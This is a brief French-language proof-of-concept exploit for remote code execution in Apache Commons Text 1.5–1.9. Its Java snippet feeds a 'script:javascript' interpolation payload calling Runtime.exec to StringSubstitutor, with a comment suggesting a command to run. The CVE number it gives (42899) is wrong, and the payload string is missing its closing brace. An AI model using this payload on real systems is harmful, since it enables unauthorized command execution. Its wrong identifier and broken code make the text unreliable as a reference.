
Exploit de preuve de concept pour CVE-2022-42899, démontrant une exécution de code à distance dans Apache Commons Text 1.5-1.9 via l'interpolation de StringSubstitutor avec des charges utiles script:javascript.
Apache Common Text de la version 1.5 à 1.9 présente une vulnérabilité d'exécution de code à distance CVE-2022-42899.
final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('<payload to execute RCE>"); // Here you will pass payload which you want to execute such as 'mkdir /tmp/cve-2022-42899'